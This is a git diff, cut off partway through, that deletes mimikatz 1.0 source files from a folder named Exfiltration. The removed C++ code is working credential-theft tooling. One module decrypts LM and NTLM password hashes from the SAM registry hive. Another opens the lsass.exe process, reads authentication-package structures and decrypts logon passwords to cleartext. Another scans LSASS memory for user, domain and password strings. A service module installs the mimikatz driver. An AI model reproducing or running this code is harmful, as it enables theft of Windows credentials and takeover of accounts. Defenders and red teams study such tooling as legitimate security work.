hBootKey[0x10] = {0}; - if(mod_hash::getHbootKeyFromBootKeyAndF(hBootKey, bootkey, bufferF)) - { - HKEY mesUsers; - code = RegOpenKeyEx(maSAM, L"Users", 0, KEY_READ, &mesUsers); - if(code == ERROR_SUCCESS) - { - DWORD nombreUsers = 0, tailleMaxSousCle = 0; - code = RegQueryInfoKey(mesUsers, NULL, NULL, NULL, &nombreUsers, &tailleMaxSousCle, NULL, NULL, NULL, NULL, NULL, NULL); - if(reussite = (code == ERROR_SUCCESS)) - { - tailleMaxSousCle++; - wchar_t * monRid = new wchar_t[tailleMaxSousCle]; - for(DWORD i = 0; i < nombreUsers ; i++) - { - DWORD tailleRid = tailleMaxSousCle; - code = RegEnumKeyExW(mesUsers, i, monRid, &tailleRid, NULL, NULL, NULL, NULL); - if(code == ERROR_SUCCESS) - { - if(_wcsicmp(monRid, L"Names") != 0) - { - HKEY monUser; - code = RegOpenKeyEx(mesUsers, monRid, 0, KEY_READ, &monUser); - if(reussite &= (code == ERROR_SUCCESS)) - { - DWORD tailleF = 0, tailleV = 0; - if((RegQueryValueEx(monUser, L"F", NULL, NULL, NULL, &tailleF) == ERROR_SUCCESS) && - (RegQueryValueEx(monUser, L"V", NULL, NULL, NULL, &tailleV) == ERROR_SUCCESS)) - { - mod_hash::USER_F * userF = reinterpret_cast<mod_hash::USER_F *>(new BYTE[tailleF]); - mod_hash::USER_V * userV = reinterpret_cast<mod_hash::USER_V *>(new BYTE[tailleV]); - - if((RegQueryValueEx(monUser, L"F", NULL, NULL, reinterpret_cast<BYTE *>(userF), &tailleF) == ERROR_SUCCESS) && - (RegQueryValueEx(monUser, L"V", NULL, NULL, reinterpret_cast<BYTE *>(userV), &tailleV) == ERROR_SUCCESS)) - infosFromUserAndKey(userF, userV, hBootKey); - - delete[] userF, userV; - } - RegCloseKey(monUser); - } - } - } else (*outputStream) << L"RegEnumKeyExW : " << mod_system::getWinError(false, code) << endl; - } - delete[] monRid; - } - RegCloseKey(mesUsers); - } else (*outputStream) << L"RegOpenKeyEx Users : " << mod_system::getWinError(false, code) << endl; - } - } else (*outputStream) << L"RegQueryValueEx 2 F : " << mod_system::getWinError(false, code) << endl; - delete[] bufferF; - } else (*outputStream) << L"RegQueryValueEx 1 F : " << mod_system::getWinError(false, code) << endl; - RegCloseKey(maSAM); - } else (*outputStream) << L"RegOpenKeyEx SAM : " << mod_system::getWinError(false, code) << endl; - - return reussite; -} - -void mod_mimikatz_samdump::infosFromUserAndKey(mod_hash::USER_F * userF, mod_hash::USER_V * userV, BYTE hBootKey[0x10]) -{ - wstring hashLM, hashNTLM; - mod_hash::decryptHash(&hashLM, hBootKey, userV, &userV->LM, userF->UserId, false); - mod_hash::decryptHash(&hashNTLM, hBootKey, userV, &userV->NTLM, userF->UserId, true); - - (*outputStream) << endl << - L"Rid : " << userF->UserId << endl << - L"User : " << wstring((wchar_t *) (&(userV->datas) + userV->Username.offset), userV->Username.lenght / sizeof(wchar_t)) << endl << - L"LM : " << hashLM << endl << - L"NTLM : " << hashNTLM << endl - ; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_samdump.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_samdump.h deleted file mode 100644 index 6586d03..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_samdump.h +++ /dev/null @@ -1,34 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_hive.h" -#include "mod_hash.h" -#include "mod_system.h" -#include <iostream> -#include <sstream> - -class mod_mimikatz_samdump -{ -private: - static bool getNControlSetFromHive(mod_hive::hive * theHive, string * rootKey, DWORD * nControlSet); - static bool getComputerNameFromHive(mod_hive::hive * theHive, string * fullControlSet, wstring * computerName); - - static bool getBootKeyFromHive(mod_hive::hive * theHive, string * fullControlSet, unsigned char bootkey[0x10]); - static bool getInfosFromHive(wstring systemHive, unsigned char bootkey[0x10]); - static bool getUsersAndHashesFromHive(wstring samHive, unsigned char bootkey[0x10]); - - static bool getBootKeyFromReg(BYTE bootkey[0x10]); - static bool getInfosFromReg(BYTE bootkey[0x10]); - static bool getUsersAndHashesFromReg(BYTE bootkey[0x10]); - - static void infosFromUserAndKey(mod_hash::USER_F * userF, mod_hash::USER_V * userV, BYTE hBootKey[0x20]); -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool bootkey(vector<wstring> * arguments); - static bool full(vector<wstring> * arguments); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_sekurlsa.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_sekurlsa.cpp deleted file mode 100644 index d8832bc..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_sekurlsa.cpp +++ /dev/null @@ -1,348 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` -http://blog.gentilkiwi.com -benjamin@gentilkiwi.com -Licence : http://creativecommons.org/licenses/by/3.0/fr/ -Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_sekurlsa.h" -#include "..\global.h" -HMODULE mod_mimikatz_sekurlsa::hLsaSrv = NULL; -HANDLE mod_mimikatz_sekurlsa::hLSASS = NULL; -mod_process::KIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa::localLSASRV, *mod_mimikatz_sekurlsa::pModLSASRV = NULL; -PLSA_SECPKG_FUNCTION_TABLE mod_mimikatz_sekurlsa::SeckPkgFunctionTable = NULL; - -bool mod_mimikatz_sekurlsa::lsassOK = false; -vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> mod_mimikatz_sekurlsa::GLOB_ALL_Providers; -vector<mod_mimikatz_sekurlsa::KIWI_MODULE_PKG_LSA> mod_mimikatz_sekurlsa::mesModules; - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_sekurlsa::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(mod_mimikatz_sekurlsa_msv1_0::getMSV, L"msv", L"numre les sessions courantes du provider MSV1_0")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(mod_mimikatz_sekurlsa_wdigest::getWDigest, L"wdigest", L"numre les sessions courantes du provider WDigest")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(mod_mimikatz_sekurlsa_kerberos::getKerberos, L"kerberos",L"numre les sessions courantes du provider Kerberos")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(mod_mimikatz_sekurlsa_tspkg::getTsPkg, L"tspkg", L"numre les sessions courantes du provider TsPkg")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(mod_mimikatz_sekurlsa_livessp::getLiveSSP, L"livessp", L"numre les sessions courantes du provider LiveSSP")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(mod_mimikatz_sekurlsa_ssp::getSSP, L"ssp", L"numre les sessions courantes du provider SSP (msv1_0)")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(getLogonPasswords, L"logonPasswords", L"numre les sessions courantes des providers disponibles")); - - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(searchPasswords, L"searchPasswords", L"rechere directement dans les segments mmoire de LSASS des mots de passes")); - return monVector; -} - -bool mod_mimikatz_sekurlsa::getLogonPasswords(vector<wstring> * arguments) -{ - if(searchLSASSDatas()) - getLogonData(arguments, &GLOB_ALL_Providers); - else - (*outputStream) << L"Donnes LSASS en erreur" << endl; - return true; -} - -bool mod_mimikatz_sekurlsa::loadLsaSrv() -{ - if(!hLsaSrv) - hLsaSrv = LoadLibrary(L"lsasrv"); - - if(mesModules.empty()) - { - mesModules.push_back(KIWI_MODULE_PKG_LSA(L"lsasrv.dll", L"msv1_0", mod_mimikatz_sekurlsa_msv1_0::getMSVLogonData, &pModLSASRV)); - mesModules.push_back(KIWI_MODULE_PKG_LSA(L"tspkg.dll", L"tspkg", mod_mimikatz_sekurlsa_tspkg::getTsPkgLogonData, &mod_mimikatz_sekurlsa_tspkg::pModTSPKG)); - mesModules.push_back(KIWI_MODULE_PKG_LSA(L"wdigest.dll", L"wdigest", mod_mimikatz_sekurlsa_wdigest::getWDigestLogonData, &mod_mimikatz_sekurlsa_wdigest::pModWDIGEST)); - mesModules.push_back(KIWI_MODULE_PKG_LSA(L"kerberos.dll", L"kerberos", mod_mimikatz_sekurlsa_kerberos::getKerberosLogonData, &mod_mimikatz_sekurlsa_kerberos::pModKERBEROS)); - mesModules.push_back(KIWI_MODULE_PKG_LSA(L"msv1_0.dll", L"ssp", mod_mimikatz_sekurlsa_ssp::getSSPLogonData, &mod_mimikatz_sekurlsa_ssp::pModMSV)); - if(mod_system::GLOB_Version.dwBuildNumber >= 8000) - mesModules.push_back(KIWI_MODULE_PKG_LSA(L"livessp.dll",L"livessp", mod_mimikatz_sekurlsa_livessp::getLiveSSPLogonData, &mod_mimikatz_sekurlsa_livessp::pModLIVESSP)); - } - return (hLsaSrv != NULL); -} - -bool mod_mimikatz_sekurlsa::unloadLsaSrv() -{ - for(vector<KIWI_MODULE_PKG_LSA>::iterator testModule = mesModules.begin(); testModule != mesModules.end(); testModule++) - if(*testModule->pModuleEntry) - delete *testModule->pModuleEntry; - - if(mod_system::GLOB_Version.dwMajorVersion < 6) - mod_mimikatz_sekurlsa_keys_nt5::uninitLSASSData(); - else - mod_mimikatz_sekurlsa_keys_nt6::uninitLSASSData(); - - if(hLSASS) - CloseHandle(hLSASS); - if(hLsaSrv) - FreeLibrary(hLsaSrv); - - return true; -} - -bool mod_mimikatz_sekurlsa::searchLSASSDatas() -{ - if(!lsassOK) - { - if(!hLSASS) - { - mod_process::KIWI_PROCESSENTRY32 monProcess; - wstring processName = L"lsass.exe"; - if(mod_process::getUniqueForName(&monProcess, &processName)) - { - if(hLSASS = OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, false, monProcess.th32ProcessID)) - { - vector<mod_process::KIWI_VERY_BASIC_MODULEENTRY> monVecteurModules; - if(mod_process::getVeryBasicModulesListForProcess(&monVecteurModules, hLSASS)) - { - for(vector<mod_process::KIWI_VERY_BASIC_MODULEENTRY>::iterator leModule = monVecteurModules.begin(); leModule != monVecteurModules.end(); leModule++) - { - for(vector<KIWI_MODULE_PKG_LSA>::iterator testModule = mesModules.begin(); testModule != mesModules.end(); testModule++) - { - if((_wcsicmp(leModule->szModule.c_str(), testModule->moduleName) == 0) && !(*testModule->pModuleEntry)) - { - GLOB_ALL_Providers.push_back(make_pair<PFN_ENUM_BY_LUID, wstring>(testModule->enumFunc, testModule->simpleName/*wstring(L"msv1_0")*/)); - *testModule->pModuleEntry = new mod_process::KIWI_VERY_BASIC_MODULEENTRY(*leModule); - break; - } - } - } - } else { - (*outputStream) << L"mod_process::getVeryBasicModulesListForProcess : " << mod_system::getWinError() << endl; - CloseHandle(hLSASS); - hLSASS = NULL; - } - } else (*outputStream) << L"OpenProcess : " << mod_system::getWinError() << endl; - } else (*outputStream) << L"mod_process::getUniqueForName : " << mod_system::getWinError() << endl; - } - - if(hLSASS) - { - MODULEINFO mesInfos; - if(GetModuleInformation(GetCurrentProcess(), hLsaSrv, &mesInfos, sizeof(MODULEINFO))) - { - localLSASRV.modBaseAddr = reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll); - localLSASRV.modBaseSize = mesInfos.SizeOfImage; - - if(!SeckPkgFunctionTable) - { - struct {PVOID LsaIRegisterNotification; PVOID LsaICancelNotification;} extractPkgFunctionTable = {GetProcAddress(hLsaSrv, "LsaIRegisterNotification"), GetProcAddress(hLsaSrv, "LsaICancelNotification")}; - if(extractPkgFunctionTable.LsaIRegisterNotification && extractPkgFunctionTable.LsaICancelNotification) - mod_memory::genericPatternSearch(reinterpret_cast<PBYTE *>(&SeckPkgFunctionTable), L"lsasrv", reinterpret_cast<PBYTE>(&extractPkgFunctionTable), sizeof(extractPkgFunctionTable), - FIELD_OFFSET(LSA_SECPKG_FUNCTION_TABLE, RegisterNotification), NULL, true, true); - } - - lsassOK = (mod_system::GLOB_Version.dwMajorVersion < 6) ? mod_mimikatz_sekurlsa_keys_nt5::searchAndInitLSASSData() : mod_mimikatz_sekurlsa_keys_nt6::searchAndInitLSASSData(); - } - } - } - return lsassOK; -} - -PLIST_ENTRY mod_mimikatz_sekurlsa::getPtrFromLinkedListByLuid(PLIST_ENTRY pSecurityStruct, unsigned long LUIDoffset, PLUID luidToFind) -{ - PLIST_ENTRY resultat = NULL; - BYTE * monBuffer = new BYTE[LUIDoffset + sizeof(LUID)]; - PLIST_ENTRY pStruct = NULL; - if(mod_memory::readMemory(pSecurityStruct, &pStruct, sizeof(pStruct), hLSASS)) - { - while(pStruct != pSecurityStruct) - { - if(mod_memory::readMemory(pStruct, monBuffer, LUIDoffset + sizeof(LUID), hLSASS)) - { - if(RtlEqualLuid(luidToFind, reinterpret_cast<PLUID>(reinterpret_cast<PBYTE>(monBuffer) + LUIDoffset))) - { - resultat = pStruct; - break; - } - } else break; - pStruct = reinterpret_cast<PLIST_ENTRY>(monBuffer)->Flink; - } - } - delete [] monBuffer; - return resultat; -} - -PVOID mod_mimikatz_sekurlsa::getPtrFromAVLByLuid(PRTL_AVL_TABLE pTable, unsigned long LUIDoffset, PLUID luidToFind) -{ - PVOID resultat = NULL; - RTL_AVL_TABLE maTable; - if(mod_memory::readMemory(pTable, &maTable, sizeof(RTL_AVL_TABLE), hLSASS)) - resultat = getPtrFromAVLByLuidRec(reinterpret_cast<PRTL_AVL_TABLE>(maTable.BalancedRoot.RightChild), LUIDoffset, luidToFind); - return resultat; -} - -PVOID mod_mimikatz_sekurlsa::getPtrFromAVLByLuidRec(PRTL_AVL_TABLE pTable, unsigned long LUIDoffset, PLUID luidToFind) -{ - PVOID resultat = NULL; - RTL_AVL_TABLE maTable; - if(mod_memory::readMemory(pTable, &maTable, sizeof(RTL_AVL_TABLE), hLSASS)) - { - if(maTable.OrderedPointer) - { - BYTE * monBuffer = new BYTE[LUIDoffset + sizeof(LUID)]; - if(mod_memory::readMemory(maTable.OrderedPointer, monBuffer, LUIDoffset + sizeof(LUID), hLSASS)) - { - if(RtlEqualLuid(luidToFind, reinterpret_cast<PLUID>(reinterpret_cast<PBYTE>(monBuffer) + LUIDoffset))) - resultat = maTable.OrderedPointer; - } - delete [] monBuffer; - } - - if(!resultat && maTable.BalancedRoot.LeftChild) - resultat = getPtrFromAVLByLuidRec(reinterpret_cast<PRTL_AVL_TABLE>(maTable.BalancedRoot.LeftChild), LUIDoffset, luidToFind); - if(!resultat && maTable.BalancedRoot.RightChild) - resultat = getPtrFromAVLByLuidRec(reinterpret_cast<PRTL_AVL_TABLE>(maTable.BalancedRoot.RightChild), LUIDoffset, luidToFind); - } - return resultat; -} - -void mod_mimikatz_sekurlsa::genericCredsToStream(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, bool justSecurity, bool isDomainFirst, PDWORD pos) -{ - if(mesCreds) - { - if(mesCreds->Password.Buffer || mesCreds->UserName.Buffer || mesCreds->Domaine.Buffer) - { - wstring userName = mod_process::getUnicodeStringOfProcess(&mesCreds->UserName, hLSASS); - wstring domainName = mod_process::getUnicodeStringOfProcess(&mesCreds->Domaine, hLSASS); - wstring password = mod_process::getUnicodeStringOfProcess(&mesCreds->Password, hLSASS, SeckPkgFunctionTable->LsaUnprotectMemory); - wstring rUserName = (isDomainFirst ? domainName : userName); - wstring rDomainName = (isDomainFirst ? userName : domainName); - - if(justSecurity) - { - if(!pos) - (*outputStream) << password; - else - (*outputStream) << endl << - L"\t [" << *pos << L"] { " << rUserName << L" ; " << rDomainName << L" ; " << password << L" }"; - } - else - { - if(!pos) - (*outputStream) << endl << - L"\t * Utilisateur : " << rUserName << endl << - L"\t * Domaine : " << rDomainName << endl << - L"\t * Mot de passe : " << password; - else - (*outputStream) << endl << - L"\t * [" << *pos << L"] Utilisateur : " << rUserName << endl << - L"\t Domaine : " << rDomainName << endl << - L"\t Mot de passe : " << password; - } - } - } else (*outputStream) << L"n.t. (LUID KO)"; -} - -bool mod_mimikatz_sekurlsa::getLogonData(vector<wstring> * mesArguments, vector<pair<PFN_ENUM_BY_LUID, wstring>> * mesProviders) -{ - PLUID sessions; - ULONG count; - - if (NT_SUCCESS(LsaEnumerateLogonSessions(&count, &sessions))) - { - for (ULONG i = 0; i < count ; i++) - { - PSECURITY_LOGON_SESSION_DATA sessionData = NULL; - if(NT_SUCCESS(LsaGetLogonSessionData(&sessions[i], &sessionData))) - { - if(sessionData->LogonType != Network) - { - (*outputStream) << endl << - L"Authentification Id : " << sessions[i].HighPart << L";" << sessions[i].LowPart << endl << - L"Package d\'authentification : " << mod_text::stringOfSTRING(sessionData->AuthenticationPackage) << endl << - L"Utilisateur principal : " << mod_text::stringOfSTRING(sessionData->UserName) << endl << - L"Domaine d\'authentification : " << mod_text::stringOfSTRING(sessionData->LogonDomain) << endl; - - for(vector<pair<PFN_ENUM_BY_LUID, wstring>>::iterator monProvider = mesProviders->begin(); monProvider != mesProviders->end(); monProvider++) - { - (*outputStream) << L'\t' << monProvider->second << (mesArguments->empty() ? (L" :") : (L"")) << L'\t'; - monProvider->first(&sessions[i], mesArguments->empty()); - (*outputStream) << endl; - } - } - LsaFreeReturnBuffer(sessionData); - } - else (*outputStream) << L"Erreur : Impossible d\'obtenir les donnes de session" << endl; - } - LsaFreeReturnBuffer(sessions); - } - else (*outputStream) << L"Erreur : Impossible d\'numerer les sessions courantes" << endl; - - return true; -} - -bool mod_mimikatz_sekurlsa::ressembleString(PUNICODE_STRING maChaine, wstring * dstChaine, BYTE **buffer) -{ - bool resultat = false; - BYTE * monBuffer = NULL; - PBYTE * leBuffer = buffer ? buffer : &monBuffer; - if(mod_process::getUnicodeStringOfProcess(maChaine, leBuffer, hLSASS)) - { - int flags = IS_TEXT_UNICODE_ODD_LENGTH | IS_TEXT_UNICODE_STATISTICS; - if(resultat = (IsTextUnicode(*leBuffer, maChaine->Length, &flags) != 0)) - { - if(dstChaine) - dstChaine->assign(reinterpret_cast<const wchar_t *>(*leBuffer), maChaine->Length / sizeof(wchar_t)); - } - } - if(monBuffer) - delete[] monBuffer; - return resultat; -} - -bool mod_mimikatz_sekurlsa::searchPasswords(vector<wstring> * arguments) -{ - if(searchLSASSDatas()) - { - if(PNT_QUERY_SYSTEM_INFORMATION NtQuerySystemInformation = reinterpret_cast<PNT_QUERY_SYSTEM_INFORMATION>(GetProcAddress(GetModuleHandle(L"ntdll"), "NtQuerySystemInformation"))) - { -#ifdef _M_X64 - PBYTE MmSystemRangeStart = reinterpret_cast<PBYTE>(0xffff080000000000); -#elif defined _M_IX86 - PBYTE MmSystemRangeStart = reinterpret_cast<PBYTE>(0x80000000); -#endif - ULONG maTaille = 0; - NtQuerySystemInformation(KIWI_SystemMmSystemRangeStart, &MmSystemRangeStart, sizeof(PBYTE), &maTaille); - - DWORD nbPossible = 0; - for(PBYTE pMemoire = 0; pMemoire < MmSystemRangeStart ; ) - { - MEMORY_BASIC_INFORMATION mesInfos; - if(VirtualQueryEx(hLSASS, pMemoire, &mesInfos, sizeof(MEMORY_BASIC_INFORMATION)) > 0) - { - if((mesInfos.Protect & PAGE_READWRITE) && !(mesInfos.Protect & PAGE_GUARD) && (mesInfos.Type == MEM_PRIVATE)) - { - UNICODE_STRING donnees[3]; - for(PBYTE pZone = reinterpret_cast<PBYTE>(mesInfos.BaseAddress); pZone < (reinterpret_cast<PBYTE>(mesInfos.BaseAddress) + mesInfos.RegionSize - 3*sizeof(UNICODE_STRING)); pZone += sizeof(DWORD)) - { - if(mod_memory::readMemory(pZone, donnees, 3*sizeof(UNICODE_STRING), hLSASS)) - { - if( - (donnees[0].Length && !((donnees[0].Length & 1) || (donnees[0].MaximumLength & 1)) && (donnees[0].Length < sizeof(wchar_t)*0xff) && (donnees[0].Length <= donnees[0].MaximumLength) && donnees[0].Buffer) && - (donnees[1].Length && !((donnees[1].Length & 1) || (donnees[1].MaximumLength & 1)) && (donnees[1].Length < sizeof(wchar_t)*0xff) && (donnees[1].Length <= donnees[1].MaximumLength) && donnees[1].Buffer) && - (donnees[2].Length && !((donnees[2].Length & 1) || (donnees[2].MaximumLength & 1)) && (donnees[2].Length < sizeof(wchar_t)*0xff) && (donnees[2].Length <= donnees[2].MaximumLength) && donnees[2].Buffer) - ) - { - wstring user, domain, password; - BYTE * bPassword = NULL; - if(ressembleString(&donnees[0], &user) && ressembleString(&donnees[1], &domain) && !ressembleString(&donnees[2], NULL, &bPassword)) - { - if(bPassword) - { - mod_mimikatz_sekurlsa::SeckPkgFunctionTable->LsaUnprotectMemory(bPassword, donnees[2].MaximumLength); - password.assign(mod_text::stringOrHex(bPassword, donnees[2].Length, 0, false)); - } - (*outputStream) << L"[" << nbPossible++ << L"] { " << user << L" ; " << domain << L" ; " << password << L" }" << endl; - } - - if(bPassword) - delete[] bPassword; - } - } - } - } - pMemoire += mesInfos.RegionSize; - } - else break; - } - } - } - else (*outputStream) << L"Donnes LSASS en erreur" << endl; - return true; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_sekurlsa.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_sekurlsa.h deleted file mode 100644 index aa05d58..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_sekurlsa.h +++ /dev/null @@ -1,64 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_memory.h" -#include "mod_process.h" -#include "mod_text.h" -#include "mod_system.h" -#include <iostream> -#include "secpkg.h" - -#include "LSA Keys/keys_nt5.h" -#include "LSA Keys/keys_nt6.h" - -#include "Security Packages/msv1_0.h" -#include "Security Packages/tspkg.h" -#include "Security Packages/wdigest.h" -#include "Security Packages/kerberos.h" -#include "Security Packages/livessp.h" -#include "Security Packages/ssp.h" - -class mod_mimikatz_sekurlsa -{ -public: - typedef bool (WINAPI * PFN_ENUM_BY_LUID) (__in PLUID logId, __in bool justSecurity); -private: - typedef struct _KIWI_MODULE_PKG_LSA { - wchar_t * moduleName; - wchar_t * simpleName; - PFN_ENUM_BY_LUID enumFunc; - mod_process::PKIWI_VERY_BASIC_MODULEENTRY * pModuleEntry; - _KIWI_MODULE_PKG_LSA(wchar_t * leModuleName, wchar_t * leSimpleName, PFN_ENUM_BY_LUID laEnumFunc, mod_process::PKIWI_VERY_BASIC_MODULEENTRY * pLeModuleEntry) : moduleName(leModuleName), simpleName(leSimpleName), enumFunc(laEnumFunc), pModuleEntry(pLeModuleEntry) {} - } KIWI_MODULE_PKG_LSA, *PKIWI_MODULE_PKG_LSA; - - static bool lsassOK; - static vector<pair<PFN_ENUM_BY_LUID, wstring>> GLOB_ALL_Providers; - static vector<KIWI_MODULE_PKG_LSA> mesModules; - - static PVOID getPtrFromAVLByLuidRec(PRTL_AVL_TABLE pTable, unsigned long LUIDoffset, PLUID luidToFind); - static bool ressembleString(PUNICODE_STRING maChaine, wstring * dstChaine = NULL, BYTE **buffer = NULL); - - static bool getLogonPasswords(vector<wstring> * arguments); - static bool searchPasswords(vector<wstring> * arguments); -public: - static HANDLE hLSASS; - static HMODULE hLsaSrv; - static mod_process::KIWI_VERY_BASIC_MODULEENTRY localLSASRV, *pModLSASRV; - static PLSA_SECPKG_FUNCTION_TABLE SeckPkgFunctionTable; - - static PLIST_ENTRY getPtrFromLinkedListByLuid(PLIST_ENTRY pSecurityStruct, unsigned long LUIDoffset, PLUID luidToFind); - static PVOID getPtrFromAVLByLuid(PRTL_AVL_TABLE pTable, unsigned long LUIDoffset, PLUID luidToFind); - - static void genericCredsToStream(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, bool justSecurity, bool isDomainFirst = false, PDWORD pos = NULL); - static bool getLogonData(vector<wstring> * mesArguments, vector<pair<PFN_ENUM_BY_LUID, wstring>> * mesProviders); - - static bool loadLsaSrv(); - static bool unloadLsaSrv(); - static bool searchLSASSDatas(); - - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_service.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_service.cpp deleted file mode 100644 index 31fb6b5..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_service.cpp +++ /dev/null @@ -1,191 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_service.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_service::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(list, L"list", L"Liste les services et pilotes")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(start, L"start", L"Dmarre un service ou pilote")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(stop, L"stop", L"Arrte un service ou pilote")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(remove, L"remove", L"Supprime un service ou pilote")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(mimikatz, L"mimikatz", L"Installe et/ou dmarre le pilote mimikatz")); - return monVector; -} - -bool mod_mimikatz_service::start(vector<wstring> * arguments) -{ - (*outputStream) << L"Dmarrage de \'"; - return genericFunction(mod_service::start, arguments); -} - -bool mod_mimikatz_service::stop(vector<wstring> * arguments) -{ - (*outputStream) << L"Arrt de \'"; - return genericFunction(mod_service::stop, arguments); -} - -bool mod_mimikatz_service::remove(vector<wstring> * arguments) -{ - (*outputStream) << L"Suppression de \'"; - return genericFunction(mod_service::remove, arguments); -} - -bool mod_mimikatz_service::genericFunction(PMOD_SERVICE_FUNC function, vector<wstring> * arguments) -{ - if(!arguments->empty()) - { - (*outputStream) << arguments->front() << L"\' : "; - if(function(&arguments->front(), NULL)) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO ; " << mod_system::getWinError(); - (*outputStream) << endl; - } - else (*outputStream) << L"(null)\' - KO ; Nom de service manquant" << endl; - - return true; -} - - -bool mod_mimikatz_service::list(vector<wstring> * arguments) -{ - bool services_fs_drivers = true; - bool services = false; - bool fs = false; - bool drivers = false; - - bool allstate = true; - bool running = false; - bool stopped = false; - - vector<mod_service::KIWI_SERVICE_STATUS_PROCESS> * vectorServices = new vector<mod_service::KIWI_SERVICE_STATUS_PROCESS>(); - if(mod_service::getList(vectorServices, (arguments->empty() ? NULL : &arguments->front()))) - { - for(vector<mod_service::KIWI_SERVICE_STATUS_PROCESS>::iterator monService = vectorServices->begin(); monService != vectorServices->end(); monService++) - { - if( - ( - (services && (monService->ServiceStatusProcess.dwServiceType & (SERVICE_WIN32_OWN_PROCESS | SERVICE_WIN32_SHARE_PROCESS))) || - (fs && (monService->ServiceStatusProcess.dwServiceType & SERVICE_FILE_SYSTEM_DRIVER)) || - (drivers && (monService->ServiceStatusProcess.dwServiceType & SERVICE_KERNEL_DRIVER)) || - (services_fs_drivers) - ) - && - ( - (running && monService->ServiceStatusProcess.dwCurrentState == SERVICE_RUNNING) || - (stopped && monService->ServiceStatusProcess.dwCurrentState == SERVICE_STOPPED) || - (allstate) - ) - ) - { - if(monService->ServiceStatusProcess.dwProcessId != 0) - (*outputStream) << setw(5) << setfill(wchar_t(' ')) << monService->ServiceStatusProcess.dwProcessId; - (*outputStream) << L'\t'; - - if(monService->ServiceStatusProcess.dwServiceType & SERVICE_INTERACTIVE_PROCESS) - (*outputStream) << L"INTERACTIVE_PROCESS" << L'\t'; - if(monService->ServiceStatusProcess.dwServiceType & SERVICE_FILE_SYSTEM_DRIVER) - (*outputStream) << L"FILE_SYSTEM_DRIVER" << L'\t'; - if(monService->ServiceStatusProcess.dwServiceType & SERVICE_KERNEL_DRIVER) - (*outputStream) << L"KERNEL_DRIVER" << L'\t'; - if(monService->ServiceStatusProcess.dwServiceType & SERVICE_WIN32_OWN_PROCESS) - (*outputStream) << L"WIN32_OWN_PROCESS" << L'\t'; - if(monService->ServiceStatusProcess.dwServiceType & SERVICE_WIN32_SHARE_PROCESS) - (*outputStream) << L"WIN32_SHARE_PROCESS" << L'\t'; - - switch(monService->ServiceStatusProcess.dwCurrentState) - { - case SERVICE_CONTINUE_PENDING: - (*outputStream) << L"CONTINUE_PENDING"; - break; - case SERVICE_PAUSE_PENDING: - (*outputStream) << L"PAUSE_PENDING"; - break; - case SERVICE_PAUSED: - (*outputStream) << L"PAUSED"; - break; - case SERVICE_RUNNING: - (*outputStream) << L"RUNNING"; - break; - case SERVICE_START_PENDING: - (*outputStream) << L"START_PENDING"; - break; - case SERVICE_STOP_PENDING: - (*outputStream) << L"STOP_PENDING"; - break; - case SERVICE_STOPPED: - (*outputStream) << 